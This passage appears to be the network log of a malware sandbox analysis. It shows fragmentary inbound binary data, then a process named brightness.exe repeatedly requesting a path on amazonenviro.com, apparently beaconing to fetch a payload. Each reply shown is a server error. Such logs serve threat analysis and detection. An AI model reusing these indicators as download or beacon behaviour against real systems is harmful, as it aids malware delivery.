Jan 10, 2025 08:58:57.617203951 CET	1236	IN	Data Raw: f6 47 fe ff 00 bf ff 00 00 00 8b 85 d8 47 fe ff 8b f0 8d 85 d7 ff fd ff 3b d8 0f 87 09 01 00 00 83 3e 00 0f 86 f3 00 00 00 80 bd f7 47 fe ff 00 75 1a b8 c4 29 40 00 b9 27 00 00 00 8b d3 e8 c8 fa ff ff 8b d8 c6 85 f7 47 fe ff 01 80 bd f6 47 fe ff Data Ascii: GG;>Gu)@'GGuOCCG@ C-C CGi)@rG,C Crt)@C9@.$F
Jan 10, 2025 08:58:57.617254019 CET	1236	IN	Data Raw: 00 00 74 12 a1 c4 37 47 00 50 e8 14 e7 ff ff 33 c0 a3 c4 37 47 00 80 3d b4 15 47 00 00 74 05 e8 63 f9 ff ff 83 3d bc 37 47 00 00 74 19 68 00 80 00 00 6a 00 a1 bc 37 47 00 50 e8 d4 e6 ff ff 33 c0 a3 bc 37 47 00 e8 20 ff ff ff c3 8d 40 00 85 c0 74 Data Ascii: t7GP37G=Gtc=7Gthj7GP37G @t(FtQ~Ft91t Fut2tP$FYt FutPFYt@g:
Jan 10, 2025 08:58:57.617285967 CET	1236	IN	Data Raw: e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e Data Ascii: t:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[ \|=ffHfHfHT)T\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49752	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:26.133274078 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:27.068224907 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:26 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49754	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:27.400490046 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:28.327038050 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:28 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49756	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:28.509505033 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:29.414518118 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:29 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49759	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:29.620853901 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:30.535300970 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:30 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49761	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:30.693134069 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:31.611861944 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:31 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49763	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:31.773597956 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:32.711414099 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:32 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49765	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:32.871587992 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:33.779359102 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:33 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49767	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:33.920243025 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:34.882731915 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:34 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49770	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:35.045032024 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:35.969995975 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:35 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49772	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:36.130758047 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:37.051531076 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:36 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49774	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:37.195750952 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:38.143450022 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:37 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49777	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:38.295550108 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:39.232263088 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:39 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49787	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:39.387639046 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:40.314548016 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:40 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49796	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:40.476210117 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:41.376718998 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:41 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49803	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:41.531194925 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:42.451180935 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:42 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49815	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:42.609934092 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:43.526401997 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:43 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49822	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:43.666394949 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:44.599970102 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:44 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49831	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:44.739330053 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:45.662324905 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:45 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49841	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:45.802113056 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:46.733742952 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:46 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49847	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:46.898849010 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:47.802615881 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:47 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49855	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:47.953768015 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:48.886893034 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:48 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49863	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:49.026380062 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:49.953263998 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:49 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49872	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:50.115751028 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:51.061712027 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:50 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49882	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:51.203576088 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:52.122479916 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:51 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49889	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:52.264478922 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:53.167829037 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:53 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49900	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:53.316425085 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:54.246026993 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:54 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49908	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:54.390418053 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:55.323048115 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:55 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49916	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:55.462063074 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:56.411364079 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:56 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49925	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:56.587902069 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:57.503993988 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:57 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49934	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:57.663830042 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:58.616508961 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:58 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49944	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:58.760201931 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 08:59:59.679389954 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 07:59:59 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49953	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:59:59.819346905 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:00.750742912 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:00 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49962	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:00.895227909 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:01.827510118 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:01 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49971	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:01.967549086 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:02.918051004 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:02 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49980	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:03.048578024 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:03.977108002 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:03 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49987	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:04.103729010 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
Jan 10, 2025 09:00:05.036585093 CET	244	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 10 Jan 2025 08:00:04 GMT Server: Apache X-Powered-By: PHP/7.3.33 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49995	166.62.27.188	80	7972	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:00:05.166538000 CET	165	OUT	GET /245_Aiymwhpjxsg HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
